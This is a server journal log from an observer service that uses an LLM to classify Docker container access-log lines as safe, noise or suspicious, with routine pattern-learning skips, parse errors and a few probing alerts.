Mar 19 22:34:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:24.751350 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.80 action=allow pattern_type=prefix
Mar 19 22:34:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:24.751385 [analyzer] Source hint mismatch: LLM says "docker/captain-captain (app access logs)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:25.873365 [llm] Failed to parse verdict from: {
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]: "classification": "safe",
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]: "confidence": 0.86,
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]: "reason": "HTTP GET to an API logs endpoint returned 304 (not modified) with a sub-25ms response time; typical of normal caching/polling behavior.",
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]: "action": "allow",
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]: "pattern_type": "prefix",
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]: "pattern": "GET /api/v2/user/apps/appData/api/logs?encoding=hex",
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]: "source_hint": "docker container reverse-proxy / application HTTP logs",
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]: "variable_fields": [
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]: {
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]: "token": "304",
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]: "type": "",
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]: "replacement": ""
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]: },
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]: {
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]: "token": "24.526 ms",
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]: "type": "duration",
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]: "replacement": ""
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]: }
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]: ]
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]: }
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:25.873401 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: invalid character '\x1b' in string literal
Mar 19 22:34:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:25.873410 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:34:23.620743872Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:34:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:27.741228 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix Mar 19 22:34:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:27.741267 [analyzer] Source hint mismatch: LLM says "docker container web/API service", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:34:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:30.691048 [analyzer] LLM verdict for docker:captain-netdata-container: classification=noise confidence=0.90 action=suppress pattern_type=prefix Mar 19 22:34:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:30.691088 [analyzer] Source hint mismatch: LLM says "netdata docker tc plugin / tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern Mar 19 22:34:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:30.965069 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:34:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:30.965105 [analyzer] Source hint mismatch: LLM says "docker container access log / reverse proxy (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:34:31 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:31.783432 [analyzer] LLM verdict for docker:captain-netdata-container: classification=noise confidence=0.72 action=suppress pattern_type=prefix Mar 19 22:34:31 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:31.783465 [analyzer] Confidence 0.72 too low for pattern learning (need 0.85+) Mar 19 22:34:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:33.031629 [analyzer] LLM verdict for docker:captain-netdata-container: classification=noise confidence=0.72 action=suppress pattern_type=prefix Mar 19 22:34:33 ip-172-26-12-110 
observer[1561913]: 2026/03/19 22:34:33.031666 [analyzer] Source hint mismatch: LLM says "netdata tc-qos-helper (tc-qos-helper.sh) via docker container", actual is "captain-netdata-container" — skipping pattern Mar 19 22:34:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:33.896462 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:34:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:33.896496 [analyzer] Source hint mismatch: LLM says "docker/captain container (web/API access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:34:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:36.162335 [observer] Pipeline: processed=501 pattern_hits=267 llm_calls=233 llm_errors=4 learned=1 Mar 19 22:34:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:36.162361 [observer] Patterns: hash=267 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=234 Mar 19 22:34:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:36.910139 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:34:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:36.910219 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container) / web API", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:34:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:39.738941 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:34:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:39.738978 [analyzer] Source hint mismatch: LLM says "docker container access log / application HTTP server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:34:42 
ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:42.665428 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:34:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:42.665463 [analyzer] Source hint mismatch: LLM says "docker/captain web service access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:34:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:45.669393 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=contains Mar 19 22:34:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:45.669431 [analyzer] Source hint mismatch: LLM says "docker container access logs / application HTTP logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:34:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:48.742812 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:34:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:48.742847 [analyzer] Source hint mismatch: LLM says "docker container access log / web API", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:34:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:51.701107 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:34:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:51.701147 [analyzer] Source hint mismatch: LLM says "docker container (captain-captain) serving an API", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:34:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:54.706278 [analyzer] LLM verdict for 
docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:34:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:54.706313 [analyzer] Source hint mismatch: LLM says "docker container web/app (captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:34:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:57.677602 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=regex Mar 19 22:34:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:34:57.677642 [analyzer] Source hint mismatch: LLM says "docker/captain-captain (container web request logging)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:35:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:03.731063 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:35:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:03.731103 [analyzer] Source hint mismatch: LLM says "docker container access log / web application", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:35:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:06.163493 [observer] Pipeline: processed=525 pattern_hits=281 llm_calls=243 llm_errors=4 learned=1 Mar 19 22:35:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:06.163517 [observer] Patterns: hash=281 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=244 Mar 19 22:35:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:06.903054 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix Mar 19 22:35:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:06.903091 [analyzer] Source hint mismatch: LLM says 
"docker container web/app access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:35:07 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:07.794590 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:35:07 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:07.794623 [analyzer] Source hint mismatch: LLM says "nginx/docker access log", actual is "captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo" — skipping pattern Mar 19 22:35:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:09.831345 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:35:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:09.831385 [analyzer] Source hint mismatch: LLM says "docker/captain (web API access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:35:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:12.710890 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:35:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:12.710921 [analyzer] Source hint mismatch: LLM says "docker container web/app access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:35:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:15.709528 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.63 action=suppress pattern_type=prefix Mar 19 22:35:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:15.709563 [analyzer] Source hint mismatch: LLM says "docker container access log / web service", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:35:18 ip-172-26-12-110 
observer[1561913]: 2026/03/19 22:35:18.821416 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:35:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:18.821455 [analyzer] Source hint mismatch: LLM says "docker container access log / web API", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:35:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:21.570339 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=contains Mar 19 22:35:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:21.570373 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:35:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:24.547265 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:35:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:24.547300 [analyzer] Source hint mismatch: LLM says "docker (container access log / web server)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:35:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:25.618527 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.84 action=allow pattern_type=prefix Mar 19 22:35:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:25.618564 [analyzer] Source hint mismatch: LLM says "docker-captain api/app access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:35:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:27.577336 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: 
classification=safe confidence=0.70 action=allow pattern_type=prefix Mar 19 22:35:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:27.577376 [analyzer] Source hint mismatch: LLM says "docker-container-http-access", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:35:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:30.713207 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix Mar 19 22:35:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:30.713241 [analyzer] Source hint mismatch: LLM says "docker/captain container web access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:35:34 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:34.029087 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:35:34 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:34.029124 [analyzer] Source hint mismatch: LLM says "docker container access log for web API", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:35:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:36.161396 [observer] Pipeline: processed=551 pattern_hits=296 llm_calls=254 llm_errors=4 learned=1 Mar 19 22:35:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:36.161417 [observer] Patterns: hash=296 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=255 Mar 19 22:35:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:36.763235 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:35:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:36.763272 [analyzer] Source hint mismatch: LLM says "docker container web service access log (API gateway/app)", actual is 
"captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:35:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:39.674858 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:35:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:39.674892 [analyzer] Source hint mismatch: LLM says "docker container HTTP access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:35:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:42.944500 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.76 action=allow pattern_type=prefix Mar 19 22:35:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:42.944539 [analyzer] Source hint mismatch: LLM says "docker (containerized web/API service access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:35:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:45.836525 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:35:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:45.836559 [analyzer] Source hint mismatch: LLM says "docker container web/app access logger (HTTP API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:35:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:48.644525 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.62 action=allow pattern_type=prefix Mar 19 22:35:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:48.644566 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container) / HTTP access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:35:51 ip-172-26-12-110 
observer[1561913]: 2026/03/19 22:35:51.742352 [llm] Failed to parse verdict from: {
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]: "classification": "safe",
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]: "confidence": 0.62,
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]: "reason": "HTTP GET request to an application logs endpoint returning 304 (not modified) with a short duration appears to be normal polling/caching behavior.",
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]: "action": "allow",
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]: "pattern_type": "prefix",
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]: "pattern": "GET /api/v2/user/apps/appData/api/logs?encoding=hex",
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]: "source_hint": "docker/captain container access log",
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]: "variable_fields": [
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]: {
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]: "token": "304",
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]: "type": "request_id",
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]: "replacement": ""
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]: },
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]: {
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]: "token": "21.879 ms",
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]: "type": "duration",
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]: "replacement": ""
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]: }
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]: ]
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]: }
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:51.742390 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: invalid character '\x1b' in string literal
Mar 19 22:35:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:51.742400 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:35:50.599959265Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:35:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:54.696697 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:35:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:54.696730 [analyzer] Source hint mismatch: LLM says "docker (container access logs / app web server)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:35:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:57.938082 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:35:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:35:57.938118 [analyzer] Source hint mismatch: LLM says "docker/container web access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:36:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:00.889897 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:36:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:00.889933 [analyzer] Source hint mismatch: LLM says "docker container web/api (reverse proxy or app logger)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:36:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:03.937694 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:36:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:03.937778 [analyzer] Source hint mismatch: LLM says "docker container access log / web server (captain-captain)", actual is 
"captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:36:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:06.162461 [observer] Pipeline: processed=573 pattern_hits=308 llm_calls=264 llm_errors=5 learned=1 Mar 19 22:36:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:06.162490 [observer] Patterns: hash=308 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=265 Mar 19 22:36:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:06.684664 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:36:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:06.684703 [analyzer] Source hint mismatch: LLM says "docker container web/app access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:36:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:09.581612 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix Mar 19 22:36:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:09.581660 [analyzer] Source hint mismatch: LLM says "docker container reverse proxy / app HTTP access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:36:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:12.968290 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix Mar 19 22:36:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:12.968327 [analyzer] Source hint mismatch: LLM says "docker/captain reverse proxy or web service (HTTP access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:36:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:15.585127 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: 
classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:36:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:15.585189 [analyzer] Source hint mismatch: LLM says "docker/captain web access log (application request logs)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:36:16 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:16.017993 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.70 action=alert pattern_type= Mar 19 22:36:16 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:16.018025 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Nginx/Docker access log shows an HTTP POST to root path with a 405 (method not allowed) from an external IP; may indicate probing or an unexpected client behavior. Line=2026-03-19T22:36:14.717310354Z 35.222.125.2 - - [19/Mar/2026:22:36:14 +0000] "test3.admin.kovicloud.com" "POST / HTTP/1.1" 405 150 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_3_2 like Mac OS X) AppleWe... 
Mar 19 22:36:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:18.725153 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:36:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:18.725203 [analyzer] Source hint mismatch: LLM says "docker container access logs (captain) / API gateway", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:36:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:21.795901 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:36:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:21.795940 [analyzer] Source hint mismatch: LLM says "docker/captain web application (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:36:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:24.758415 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix Mar 19 22:36:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:24.758455 [analyzer] Source hint mismatch: LLM says "docker container access log (API service)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:36:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:25.891777 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:36:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:25.891818 [analyzer] Source hint mismatch: LLM says "docker/captain web/API access log (app service)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:36:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:27.839760 [analyzer] LLM verdict 
for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:36:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:27.839793 [analyzer] Source hint mismatch: LLM says "docker container web/API access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:36:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:30.827482 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:36:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:30.827524 [analyzer] Source hint mismatch: LLM says "docker containerized web/app server access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:36:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:33.700540 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:36:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:33.700578 [analyzer] Source hint mismatch: LLM says "docker app (HTTP access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:36:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:36.100547 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type= Mar 19 22:36:36 ip-172-26-12-110 